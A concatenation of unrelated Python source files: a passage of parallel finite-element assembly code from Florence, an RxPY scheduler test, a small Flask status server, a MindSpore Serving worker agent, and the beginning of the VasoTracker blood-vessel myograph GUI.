I_stiffness[pelements,:] = partitioned_maps[i][tups[0]].reshape(pmesh[i].nelem,local_capacity)
J_stiffness[pelements,:] = partitioned_maps[i][tups[1]].reshape(pmesh[i].nelem,local_capacity)
V_stiffness[pelements,:] = tups[2].reshape(pmesh[i].nelem,local_capacity)
T[pnodes,:] += tups[-1].reshape(pnodes.shape[0],nvar)
if fem_solver.analysis_type != "static" and fem_solver.is_mass_computed is False:
I_mass[pelements,:] = partitioned_maps[i][tups[3]].reshape(pmesh[i].nelem,local_capacity)
J_mass[pelements,:] = partitioned_maps[i][tups[4]].reshape(pmesh[i].nelem,local_capacity)
V_mass[pelements,:] = tups[5].reshape(pmesh[i].nelem,local_capacity)
proc.join()
if fem_solver.parallel_model == "pool" or fem_solver.parallel_model == "context_manager" \
or fem_solver.parallel_model == "joblib" or fem_solver.parallel_model == "scoop" \
or fem_solver.parallel_model == "dask" or fem_solver.parallel_model == "thread_pool":
for i in range(fem_solver.no_of_cpu_cores):
pnodes = pnode_indices[i]
pelements = pelement_indices[i]
I_stiffness[pelements,:] = partitioned_maps[i][tups[i][0]].reshape(pmesh[i].nelem,local_capacity)
J_stiffness[pelements,:] = partitioned_maps[i][tups[i][1]].reshape(pmesh[i].nelem,local_capacity)
V_stiffness[pelements,:] = tups[i][2].reshape(pmesh[i].nelem,local_capacity)
T[pnodes,:] += tups[i][-1].reshape(pnodes.shape[0],nvar)
if fem_solver.analysis_type != "static" and fem_solver.is_mass_computed is False:
I_mass[pelements,:] = partitioned_maps[i][tups[i][3]].reshape(pmesh[i].nelem,local_capacity)
J_mass[pelements,:] = partitioned_maps[i][tups[i][4]].reshape(pmesh[i].nelem,local_capacity)
V_mass[pelements,:] = tups[i][5].reshape(pmesh[i].nelem,local_capacity)
stiffness = csr_matrix((V_stiffness.ravel(),(I_stiffness.ravel(),J_stiffness.ravel())),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])),dtype=np.float64)
F, mass = [], []
if fem_solver.analysis_type != "static" and fem_solver.is_mass_computed is False:
mass = csr_matrix((V_mass.ravel(),(I_mass.ravel(),J_mass.ravel())),
shape=((nvar*mesh.points.shape[0],nvar*mesh.points.shape[0])),dtype=np.float64)
return stiffness, T.ravel(), F, mass
class ExplicitParallelZipper(object):
def __init__(self, function_space, formulation, mesh, material, Eulerx, Eulerp):
self.function_space = function_space
self.formulation = formulation
self.mesh = mesh
self.material = material
self.Eulerx = Eulerx
self.Eulerp = Eulerp
class ExplicitParallelZipperMPI(object):
def __init__(self, formulation, mesh, material, pnodes):
self.formulation = formulation
self.material = material
self.mesh = mesh
self.pnodes = pnodes
class ExplicitParallelZipperHDF5(object):
def __init__(self, formulation, mesh, material):
self.formulation = formulation
self.material = material
self.mesh = mesh
def ExplicitParallelExecuter_PoolBased(functor):
return _LowLevelAssemblyExplicit_Par_(functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
def ExplicitParallelExecuter_ProcessBased(functor, proc, Ts):
T = _LowLevelAssemblyExplicit_Par_(functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
Ts[proc] = T
def ExplicitParallelExecuter_ProcessQueueBased(functor, queue):
T = _LowLevelAssemblyExplicit_Par_(functor.function_space,
functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
queue.put(T)
def ExplicitParallelExecuter_HDF5Based(functor, proc, fname_in, fname_out):
import h5py
h5f_out = h5py.File(fname_out+str(proc)+'.h5','r')
Eulerx = h5f_out['Geometry']['Eulerx'][:]
Eulerp = h5f_out['Geometry']['Eulerp'][:]
functor.mesh.points = h5f_out['Geometry']['points'][:]
functor.mesh.elements = h5f_out['Geometry']['elements'][:]
T = _LowLevelAssemblyExplicit_Par_(functor.formulation.function_spaces[0],
functor.formulation, functor.mesh, functor.material, Eulerx, Eulerp)
# T = _LowLevelAssemblyExplicit_Par_(functor.formulation.function_spaces[0],
# functor.formulation, functor.mesh, functor.material, functor.Eulerx, functor.Eulerp)
h5f = h5py.File(fname_in+str(proc)+'.h5','w')
h5f.create_dataset('T', data=T)
h5f.close()
def ExplicitParallelLauncher(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp):
from multiprocessing import Process, Pool, Manager, Queue
from contextlib import closing
pmesh, pelement_indices, pnode_indices = fem_solver.pmesh, fem_solver.pelement_indices, fem_solver.pnode_indices
T_all = np.zeros((mesh.points.shape[0],formulation.nvar),np.float64)
# MPI BASED
if fem_solver.parallel_model == "mpi":
try:
from mpi4py import MPI
except ImportError:
raise ImportError("mpi4py is not installed. Install it using 'pip install mpi4py'")
from Florence import PWD
comm = MPI.COMM_SELF.Spawn(sys.executable,
args=[PWD(__file__)+'/MPIParallelExplicitAssembler.py'],
maxprocs=fem_solver.no_of_cpu_cores)
funcs = []
for proc in range(fem_solver.no_of_cpu_cores):
obj = ExplicitParallelZipperMPI(formulation, pmesh[proc], material, pnode_indices[proc])
funcs.append(obj)
T_all_size = np.array([mesh.points.shape[0],formulation.ndim, formulation.nvar],dtype="i")
comm.Bcast([T_all_size, MPI.INT], root=MPI.ROOT)
comm.bcast(funcs, root=MPI.ROOT)
comm.Bcast([Eulerx, MPI.DOUBLE], root=MPI.ROOT)
comm.Bcast([Eulerp, MPI.DOUBLE], root=MPI.ROOT)
# for proc in range(fem_solver.no_of_cpu_cores):
# globals()['points%s' % proc] = pmesh[proc].points
# globals()['elements%s' % proc] = pmesh[proc].elements
# globals()['nelems%s' % proc] = pmesh[proc].elements.nelem
# globals()['nnodes%s' % proc] = pmesh[proc].points.nnode
# Main T_all TO BE FILLED
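        # With a None send buffer at the root, comm.Reduce sums the workers'
        # partial internal-force vectors element-wise into T_all on this process.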
comm.Reduce(None, [T_all, MPI.DOUBLE], root=MPI.ROOT)
comm.Disconnect()
return T_all.ravel()
# PROCESS AND HDF5 BASED
elif fem_solver.parallel_model == "hdf5":
try:
import h5py
except ImportError:
raise ImportError("h5py is not installed. Install it using 'pip install h5py'")
import shutil
from Florence import Mesh
home = os.path.expanduser("~")
tmp_folder = os.path.join(home,".florence_tmp000")
if not os.path.exists(tmp_folder):
os.makedirs(tmp_folder)
fname_in = os.path.join(tmp_folder,"results_explicit")
fname_out = os.path.join(tmp_folder,"geometry_explicit")
# funcs = []
# for proc in range(fem_solver.no_of_cpu_cores):
# pnodes = pnode_indices[proc]
# Eulerx_current = Eulerx[pnodes,:]
# Eulerp_current = Eulerp[pnodes]
# obj = ExplicitParallelZipper(function_space, formulation,
# pmesh[proc], material, Eulerx_current, Eulerp_current)
# funcs.append(obj)
funcs = []
for proc in range(fem_solver.no_of_cpu_cores):
pnodes = pnode_indices[proc]
Eulerx_current = Eulerx[pnodes,:]
Eulerp_current = Eulerp[pnodes]
h5f_out = h5py.File(fname_out+str(proc)+'.h5','w')
grp = h5f_out.create_group('Geometry')
grp.create_dataset('elements', data=pmesh[proc].elements)
grp.create_dataset('points', data=pmesh[proc].points)
grp.create_dataset('Eulerx', data=Eulerx_current)
grp.create_dataset('Eulerp', data=Eulerp_current)
h5f_out.close()
imesh = Mesh()
imesh.nnode, imesh.nelem, imesh.element_type = pmesh[proc].nnode, pmesh[proc].nelem, pmesh[proc].element_type
obj = ExplicitParallelZipperHDF5(formulation, imesh, material)
funcs.append(obj)
procs = []
for i, func in enumerate(funcs):
proc = Process(target=ExplicitParallelExecuter_HDF5Based, args=(func, i, fname_in, fname_out))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
for proc in range(fem_solver.no_of_cpu_cores):
h5f = h5py.File(fname_in+str(proc)+'.h5','r')
T = h5f['T'][:]
pnodes = pnode_indices[proc]
T_all[pnodes,:] += T.reshape(pnodes.shape[0],formulation.nvar)
shutil.rmtree(tmp_folder)
return T_all.ravel()
funcs = []
for proc in range(fem_solver.no_of_cpu_cores):
pnodes = pnode_indices[proc]
Eulerx_current = Eulerx[pnodes,:]
Eulerp_current = Eulerp[pnodes]
obj = ExplicitParallelZipper(function_space, formulation,
pmesh[proc], material, Eulerx_current, Eulerp_current)
funcs.append(obj)
# SERIAL
# for proc in range(fem_solver.no_of_cpu_cores):
# T = ExplicitParallelExecuter_PoolBased(funcs[proc])
# pnodes = pnode_indices[proc]
# T_all[pnodes,:] += T.reshape(pnodes.shape[0],formulation.nvar)
# PROCESS AND MANAGER BASED
if fem_solver.parallel_model == "context_manager":
procs = []
manager = Manager(); Ts = manager.dict() # SPAWNS A NEW PROCESS
for i, func in enumerate(funcs):
proc = Process(target=ExplicitParallelExecuter_ProcessBased, args=(func,i,Ts))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
# POOL BASED
elif fem_solver.parallel_model == "pool":
with closing(Pool(processes=fem_solver.no_of_cpu_cores)) as pool:
Ts = pool.map(ExplicitParallelExecuter_PoolBased,funcs)
pool.terminate()
# DOESN'T SCALE WELL
# Ts = pool.map_async(ExplicitParallelExecuter_PoolBased,funcs)
# Ts.wait()
# Ts = Ts.get()
# THREAD POOL INSTEAD OF PROCESSING POOL
elif fem_solver.parallel_model == "thread_pool":
import multiprocessing.dummy
with closing(multiprocessing.dummy.Pool(fem_solver.no_of_cpu_cores)) as pool:
Ts = pool.map(ExplicitParallelExecuter_PoolBased,funcs)
pool.terminate()
# DASK BASED
elif fem_solver.parallel_model == "dask":
try:
from dask.distributed import Client, LocalCluster
except ImportError:
raise ImportError("dask is not installed. Install it 'using pip install dask[complete]'")
# CREATE A DUMMY CALLABLE
# reducer = lambda tups: tups
client = fem_solver.dask_client
future = client.scatter(funcs)
job = client.map(ExplicitParallelExecuter_PoolBased, future)
# total = client.submit(reducer, job)
# Ts = total.result()
Ts = client.gather(job)
# JOBLIB BASED
elif fem_solver.parallel_model == "joblib":
try:
from joblib import Parallel, delayed
except ImportError:
raise ImportError("Joblib is not installed. Install it using 'pip install joblib'")
Ts = Parallel(n_jobs=fem_solver.no_of_cpu_cores)(delayed(ExplicitParallelExecuter_PoolBased)(func) for func in funcs)
# Ts = Parallel(n_jobs=10, backend="threading")(delayed(ImplicitParallelExecuter_PoolBased)(func) for func in funcs)
# SCOOP BASED
elif fem_solver.parallel_model == "scoop":
try:
from scoop import futures
except ImportError:
raise ImportError("Scoop is not installed. Install it using 'pip install scoop'")
Ts = list(futures.map(ExplicitParallelExecuter_PoolBased, funcs))
# TBB BASED
elif fem_solver.parallel_model == "tbb":
try:
from TBB import Pool as tbbpool
except ImportError:
raise ImportError("TBB is not installed. The easiest way to install it is using ananconda - 'conda install intel tbb'")
with closing(tbbpool(nworkers=fem_solver.no_of_cpu_cores)) as pool:
Ts = pool.map(ExplicitParallelExecuter_PoolBased,funcs)
pool.terminate()
# PROCESS AND QUEUE BASED
elif fem_solver.parallel_model == "queue":
procs = []
for i, func in enumerate(funcs):
queue = Queue()
proc = Process(target=ExplicitParallelExecuter_ProcessQueueBased, args=(func,queue))
proc.daemon = True
procs.append(proc)
proc.start()
pnodes = pnode_indices[i]
T = queue.get()
T_all[pnodes,:] += T.reshape(pnodes.shape[0],formulation.nvar)
proc.join()
if fem_solver.parallel_model == "pool" or fem_solver.parallel_model == "context_manager" \
or fem_solver.parallel_model == "joblib" or fem_solver.parallel_model == "scoop" \
or fem_solver.parallel_model == "tbb" or fem_solver.parallel_model == "dask" \
or fem_solver.parallel_model == "thread_pool":
for proc in range(fem_solver.no_of_cpu_cores):
pnodes = pnode_indices[proc]
T_all[pnodes,:] += Ts[proc].reshape(pnodes.shape[0],formulation.nvar)
return T_all.ravel()
#---------------------------------------- HIGHER LEVEL ASSEMBLY ROUTINE -----------------------------------------#
#----------------------------------------------------------------------------------------------------------------#
def AssembleMass(formulation, mesh, material, fem_solver, rho=1.0, mass_type=None, Eulerx=None):
t_mass_assembly = time()
if mesh.element_type == "tri" or mesh.element_type == "tet":
function_space = formulation.function_spaces[1]
else:
function_space = formulation.function_spaces[0]
mesh.ChangeType()
formulation.GetConstantMassIntegrand(function_space, material)
fem_solver.ComputeSparsityFEM(mesh, formulation)
    if fem_solver.mass_type is None:
fem_solver.mass_type = "consistent"
try:
from Florence.VariationalPrinciple._MassIntegrand_ import __TotalConstantMassIntegrand__
if fem_solver.recompute_sparsity_pattern:
M, I_mass, J_mass, V_mass = __TotalConstantMassIntegrand__(mesh, function_space, formulation, fem_solver.mass_type)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,(I_mass,J_mass)),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
else:
M, V_mass = __TotalConstantMassIntegrand__(mesh, function_space,
formulation, fem_solver.mass_type, fem_solver.recompute_sparsity_pattern,
fem_solver.squeeze_sparsity_pattern, fem_solver.indices, fem_solver.indptr,
fem_solver.data_global_indices, fem_solver.data_local_indices)
if fem_solver.mass_type == "consistent":
M = csr_matrix((V_mass,fem_solver.indices,fem_solver.indptr),shape=((formulation.nvar*mesh.points.shape[0],
formulation.nvar*mesh.points.shape[0])),dtype=np.float64)
except:
if Eulerx is None:
Eulerx = np.copy(mesh.points)
Eulerp = np.zeros(mesh.points.shape[0])
M = AssembleExplicit_NoLLD_Mass(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)
t_mass_assembly = time() - t_mass_assembly
return M
def AssembleForm(formulation, mesh, material, fem_solver, Eulerx=None, Eulerp=None):
from Florence import BoundaryCondition
boundary_condition = BoundaryCondition()
solver=None
fem_solver.__checkdata__(material, boundary_condition,
formulation, mesh, formulation.function_spaces, solver, contact_formulation=None)
if fem_solver.parallel:
import multiprocessing
if fem_solver.no_of_cpu_cores is None:
fem_solver.no_of_cpu_cores = multiprocessing.cpu_count()
if fem_solver.parallel_model is None:
if fem_solver.analysis_type == "dynamic" and fem_solver.analysis_subtype == "explicit":
fem_solver.parallel_model = "context_manager"
else:
fem_solver.parallel_model = "pool"
fem_solver.PartitionMeshForParallelFEM(mesh,fem_solver.no_of_cpu_cores,formulation.nvar)
if fem_solver.parallel_model=="dask" and fem_solver.is_dask_scheduler_initialised is False:
fem_solver.LaunchDaskDistributedClient()
mesh.ChangeType()
if Eulerx is None:
Eulerx = np.copy(mesh.points)
if Eulerp is None:
Eulerp = np.zeros(mesh.points.shape[0])
function_space = formulation.function_spaces[0]
fem_solver.is_mass_computed = True
if not fem_solver.parallel:
fem_solver.ComputeSparsityFEM(mesh, formulation)
if formulation.fields == "couple_stress" or formulation.fields == "flexoelectricity":
lmesh = mesh.GetLinearMesh(remap=True)
Eulerw = np.zeros_like(lmesh.points)
Eulers = np.zeros_like(lmesh.points)
return formulation.Assemble(fem_solver, material, Eulerx, Eulerw, Eulers, Eulerp)[:2]
return Assemble(fem_solver, function_space, formulation, mesh, material, Eulerx, Eulerp)[:2]
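# Usage sketch (not part of the original module): with Florence mesh, material,
# formulation and solver objects already constructed elsewhere, the two helpers
# above can be combined to obtain the mass matrix and the stiffness/residual
# pair (the first two outputs of Assemble). The object names below are
# placeholders, not guarantees about the Florence API.
#
#   M = AssembleMass(formulation, mesh, material, fem_solver)
#   K, residual = AssembleForm(formulation, mesh, material, fem_solver)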
|
test_asynciothreadsafescheduler.py
|
import unittest
import asyncio
import threading
from datetime import datetime, timedelta
from rx.scheduler.eventloop import AsyncIOThreadSafeScheduler
class TestAsyncIOThreadSafeScheduler(unittest.TestCase):
def test_asyncio_threadsafe_schedule_now(self):
loop = asyncio.get_event_loop()
scheduler = AsyncIOThreadSafeScheduler(loop)
diff = scheduler.now - datetime.utcfromtimestamp(loop.time())
assert abs(diff) < timedelta(milliseconds=1)
    def test_asyncio_threadsafe_schedule_now_units(self):
        loop = asyncio.get_event_loop()
        scheduler = AsyncIOThreadSafeScheduler(loop)
        @asyncio.coroutine
        def go():
            diff = scheduler.now
            yield from asyncio.sleep(0.1, loop=loop)
            diff = scheduler.now - diff
            assert timedelta(milliseconds=80) < diff < timedelta(milliseconds=180)
        loop.run_until_complete(go())
def test_asyncio_threadsafe_schedule_action(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOThreadSafeScheduler(loop)
ran = False
def action(scheduler, state):
nonlocal ran
ran = True
def schedule():
scheduler.schedule(action)
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.1, loop=loop)
assert ran is True
loop.run_until_complete(go())
def test_asyncio_threadsafe_schedule_action_due(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOThreadSafeScheduler(loop)
starttime = loop.time()
endtime = None
def action(scheduler, state):
nonlocal endtime
endtime = loop.time()
def schedule():
scheduler.schedule_relative(0.2, action)
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.3, loop=loop)
assert endtime is not None
diff = endtime - starttime
assert diff > 0.18
loop.run_until_complete(go())
def test_asyncio_threadsafe_schedule_action_cancel(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
ran = False
scheduler = AsyncIOThreadSafeScheduler(loop)
def action(scheduler, state):
nonlocal ran
ran = True
def schedule():
d = scheduler.schedule_relative(0.05, action)
d.dispose()
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.3, loop=loop)
assert ran is False
loop.run_until_complete(go())
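if __name__ == '__main__':
    # Not in the original file: allows running this test module directly
    # (it is normally collected by an external runner such as pytest or
    # `python -m unittest`).
    unittest.main()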
|
app.py
|
from flask import Flask, request, jsonify
app = Flask(__name__)
def success(msg):
return jsonify({"code": 200, "msg": msg})
def data(json_data):
return jsonify({"code": 200, "data": json_data})
def error(msg):
return jsonify({"code": 500, "msg": msg})
@app.route('/', methods=['GET'])
def get_status():
"""get the node status and return data"""
return data({})
def run_server():
from threading import Thread
thread = Thread(target=app.run, kwargs={'port': 5000, 'host': '0.0.0.0'})
thread.start()
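if __name__ == '__main__':
    # Minimal usage sketch (an assumption, not in the original file): start the
    # API server in its background thread; the non-daemon thread keeps the
    # process alive after the main thread returns.
    run_server()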
|
worker_agent.py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Serving, distributed worker agent"""
import os
import threading
from mindspore_serving._mindspore_serving import WorkerAgent_, AgentStartUpConfig_, ExitSignalHandle_
from mindspore_serving import log as logger
from mindspore_serving.server.worker import init_mindspore
def start_worker_agent(start_config, dec_key, dec_mode):
"""Start up one worker agent on one device id, invoke by agent_startup.startup_worker_agents
"""
if not isinstance(start_config, AgentStartUpConfig_):
raise RuntimeError("Parameter 'start_config' should be instance of AgentStartUpConfig_")
logger.info(f"rank_id={start_config.rank_id}, device_id={start_config.device_id}, "
f"model_file='{start_config.model_file_names}', group_file='{start_config.group_file_names}', "
f"rank_table_file='{start_config.rank_table_json_file_name}',"
f"agent_address='{start_config.agent_address}', "
f"distributed_address='{start_config.distributed_address}'"
f"with_batch_dim={start_config.common_meta.with_batch_dim}, "
f"without_batch_dim_inputs={start_config.common_meta.without_batch_dim_inputs}")
ExitSignalHandle_.start() # Set flag to running and receive Ctrl+C message
init_mindspore.init_mindspore_cxx_env()
os.environ["RANK_ID"] = str(start_config.rank_id)
os.environ["DEVICE_ID"] = str(start_config.device_id)
os.environ["MS_ENABLE_HCCL"] = "1"
if start_config.group_file_names:
os.environ["PARA_GROUP_FILE"] = ';'.join(start_config.group_file_names)
os.environ["RANK_TABLE_FILE"] = start_config.rank_table_json_file_name
for item in ("RANK_ID", "DEVICE_ID", "MS_ENABLE_HCCL", "PARA_GROUP_FILE", "RANK_TABLE_FILE",
"LD_LIBRARY_PATH", "PYTHONPATH"):
logger.info(f"Env {item}: {os.getenv(item, None)}")
if dec_key is None:
dec_key = ''
WorkerAgent_.start_agent(start_config, dec_key, dec_mode)
start_wait_and_clear()
_wait_and_clear_thread = None
def start_wait_and_clear():
"""Waiting for Ctrl+C, and clear up environment"""
def thread_func():
logger.info("Serving worker Agent: wait for Ctrl+C to exit ------------------------------------")
print("Serving worker Agent: wait for Ctrl+C to exit ------------------------------------")
WorkerAgent_.wait_and_clear()
logger.info("Serving worker Agent: exited ------------------------------------")
print("Serving worker Agent: exited ------------------------------------")
global _wait_and_clear_thread
if not _wait_and_clear_thread:
_wait_and_clear_thread = threading.Thread(target=thread_func)
_wait_and_clear_thread.start()
def stop():
r"""
Stop the running of agent.
"""
WorkerAgent_.stop_and_clear()
|
VasoTracker.py
|
##################################################
## VasoTracker Pressure Myograph Software
##
## This software provides diameter measurements (inner and outer) of pressurised blood vessels
## Designed to work with Thorlabs DCC1545M
## For additional info see www.vasostracker.com and https://github.com/kaelome/VasoTracker
##
##################################################
##
## BSD 3-Clause License
##
## Copyright (c) 2018, VasoTracker
## All rights reserved.
##
## Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## * Redistributions of source code must retain the above copyright notice, this
## list of conditions and the following disclaimer.
##
## * Redistributions in binary form must reproduce the above copyright notice,
## this list of conditions and the following disclaimer in the documentation
## and/or other materials provided with the distribution.
##
## * Neither the name of the copyright holder nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
## IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
## DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
## FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
## DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
## SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
## CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
## OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
##
##################################################
##
## Author: Penelope F Lawton, Matthew D Lee, and Calum Wilson
## Copyright: Copyright 2018, VasoTracker
## Credits: Penelope F Lawton, Matthew D Lee, and Calum Wilson
## License: BSD 3-Clause License
## Version: 1.0.0
## Maintainer: Calum Wilson
## Email: c.wilson.strath@gmail.com
## Status: Production
##
##################################################
## We found the following to be useful:
## https://www.safaribooksonline.com/library/view/python-cookbook/0596001673/ch09s07.html
## http://code.activestate.com/recipes/82965-threads-tkinter-and-asynchronous-io/
## https://www.physics.utoronto.ca/~phy326/python/Live_Plot.py
from __future__ import division
# Tkinter imports
import Tkinter as tk
from Tkinter import *
import tkSimpleDialog
import tkMessageBox as tmb
import tkFileDialog
import ttk
from PIL import Image, ImageTk #convert cv2 image to tkinter
E = tk.E
W = tk.W
N = tk.N
S = tk.S
ypadding = 1.5 #ypadding just to save time - used for both x and y
# Other imports
import os
import time
import datetime
import threading
import random
import Queue
import numpy as np
import cv2
import csv
from skimage import io
import skimage
from skimage import measure
# Import Vasotracker functions
import VTutils
# Add MicroManager to path
import sys
MM_PATH = os.path.join('C:', os.path.sep, 'Program Files','Micro-Manager-1.4')
sys.path.append(MM_PATH)
os.environ['PATH'] = MM_PATH + ';' + os.environ['PATH']
import MMCorePy
'''
import sys
sys.path.append('C:\Program Files\Micro-Manager-1.4')
import MMCorePy
'''
# Import matplotlib
import matplotlib
#matplotlib.use('Qt5Agg')
#matplotlib.use('Qt4Agg', warn=True)
import matplotlib.backends.tkagg as tkagg
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
import matplotlib.pyplot as plt
from matplotlib.backends import backend_qt4agg
from matplotlib import pyplot
class GuiPart(tk.Frame):
#Initialisation function
def __init__(self, master, queue, endCommand, *args, **kwargs):
tk.Frame.__init__(self, *args, **kwargs)
self.queue = queue
self.endApplication = endCommand
#Set up the GUI
self.grid(sticky=N+S+E+W)
top = self.winfo_toplevel()
top.rowconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self.columnconfigure(0, weight=1)
self.filename = self.get_file_name()
self.multiplication_factor = self.get_scale()
self.initUI(endCommand)
# Open the csv file and then clear it
f = open(self.filename.name, "w+")
f.close()
# Add the headers
with open((self.filename.name), 'ab') as f:
w=csv.writer(f, quoting=csv.QUOTE_ALL)
w.writerow(("Time","Outer Diameter", "Inner Diameter"))
# Add file for table
#head,tail = os.path.split(self.filename.name)
self.txt_file = os.path.splitext(self.filename.name)[0]
print "tail = ", self.txt_file
self.txt_file = self.txt_file + ' - Table' + '.csv'
g = open(self.txt_file, "w+")
g.close()
with open((self.txt_file), 'ab') as g:
v=csv.writer(g, quoting=csv.QUOTE_ALL)
column_headings = 'Time (s)', 'Label', 'Diameter', 'Pressure 1 (mmHg)', 'Pressure 2 (mmHg)'
v.writerow(column_headings)
# Function for getting the save file.
def get_file_name(self):
tmb.showinfo("", "Create a file to save output...")
now = datetime.datetime.now()
savename = now.strftime("%Y%m%d")
f = tkFileDialog.asksaveasfile(mode='w', defaultextension=".csv", initialdir="Results\\", initialfile=savename)
        if f:
            return f
        else:  # asksaveasfile returns `None` if the dialog is closed with "cancel".
            if tmb.askquestion("No save file selected", "Do you want to quit VasoTracker?", icon='warning') == 'yes':
                self.endApplication()
            else:
                return self.get_file_name()
# Function for getting the save file.
def get_scale(self):
scale = tkSimpleDialog.askfloat("Input", "How many um per pixel?")
if scale is None:
scale = 1
return(scale)
# Function for writing to the save file
def writeToFile(self,data):
with open((self.filename.name), 'ab') as f:
w=csv.writer(f, quoting=csv.QUOTE_ALL)
w.writerow(data)
# Function for closing down
def close_app(self):
if tmb.askokcancel("Close", "Are you sure...?"):
self.endApplication()
# Function for defining an average checkbox ## Shouldbe in toolbar!
def average_checkbox(self, window, text):
avg_checkbox = ttk.Checkbutton(window, text=text)
avg_checkbox.grid(row=0, columnspan=4, padx=3, pady=3)
# Second Function for initialising the GUI
def initUI(self,endCommand):
# make Esc exit the program
        root.bind('<Escape>', lambda e: endCommand())
# make the top right close button minimize (iconify) the main window
root.protocol("WM_DELETE_WINDOW", self.close_app)
# create a menu bar with an Exit command
menubar = tk.Menu(root)
filemenu = tk.Menu(menubar, tearoff=0)
filemenu.add_command(label="Exit", command=self.close_app)
menubar.add_cascade(label="File", menu=filemenu)
root.config(menu=menubar)
self.pack(fill=BOTH, expand=1)
# Make the toolbar along the top
self.toolbar = ToolBar(self)#ttk.Frame(root, height=150)
self.toolbar.grid(row=0, column=0,rowspan=1,columnspan=3, padx=ypadding, pady=ypadding, sticky=E+S+W+N)
# Make the status bar along the bottom
self.status_bar = ttk.Label(text = 'Thank you for using VasoTracker.', relief=SUNKEN, anchor='w')
self.status_bar.pack(side=BOTTOM, fill=X)
# Make the graph frame
self.graphframe = GraphFrame(self)
self.graphframe.grid(row=1, column=0, rowspan=3, padx=ypadding, pady=ypadding, sticky=E+S+W+N)
# Make the table frame
self.tableframe = TableFrame(self)
self.tableframe.grid(row=1, column=2, padx=ypadding, pady=ypadding, sticky=E+S+W+N)
# Make the Camera Frame bottom right
self.cameraframe = CameraFrame(self)
self.cameraframe.grid(row=2, column=2, padx=ypadding, pady=ypadding, sticky=E+S+W+N)
if self.toolbar.start_flag:
mmc.startContinuousSequenceAcquisition(500)
# Count function for reading in with FakeCamera
self.count = 0
# This function will process all of the incoming images
def processIncoming(self, outers, inners, timelist):
"""Handle all messages currently in the queue, if any."""
while self.queue.qsize( ):
print "Queue size = ", self.queue.qsize( )
try:
if self.toolbar.record_flag:
if self.count == 0:
global start_time
start_time=time.time()
# This is for loading in a video as an example!
try:
mmc.setProperty('Focus', "Position", self.count)
except:
pass
#Get the image
msg = self.queue.get(0)
# Check contents of message and do whatever is needed. As a simple test, print it (in real life, you would suitably update the GUI's display in a richer fashion).
#Get the time
timenow = time.time() - start_time
print "Checkbox Status = ", self.toolbar.record_is_checked.get()
if self.toolbar.record_is_checked.get() == 1 and self.count%60 == 0:
print head
print tail
timenow2 = int(timenow)
gfxPath = os.path.join(head, '%s_t=%ss.tiff' % (os.path.splitext(tail)[0],timenow2))
skimage.io.imsave(gfxPath, msg)
#print msg
self.calculate_diameter = Calculate_Diameter(self,self.multiplication_factor)
global OD
global ID
outer_diameters1,outer_diameters2,inner_diameters1,inner_diameters2,OD,ID,start = self.calculate_diameter.calc(msg, self.multiplication_factor)
if self.count == 0:
global initOD, initID
initOD = OD
initID = ID
params = timenow,outer_diameters1,outer_diameters2,inner_diameters1,inner_diameters2,OD,start
savedata = timenow,OD,ID
self.writeToFile(savedata)
self.cameraframe.process_queue(params,msg)
timelist.append(timenow)
#print timelist
outers.append(OD)
inners.append(ID)
self.graphframe.plot(timelist,outers,inners,self.toolbar.xlims, self.toolbar.ylims, self.toolbar.xlims2, self.toolbar.ylims2)
self.count += 1
else:
msg = self.queue.get(0)
params = 0,0,0,0,0,0,0
self.cameraframe.process_queue(params,msg)
print self.count
return
except Queue.Empty:
# just on general principles, although we don't expect this branch to be taken in this case
pass
return
class setCamera(object):
def __init__(self,camera_label):
camera_label = camera_label
#print "working out the diameter"
def set(self, camera_label):
mmc.reset()
if camera_label == "Thorlabs":
print "Camera Selected: ", camera_label
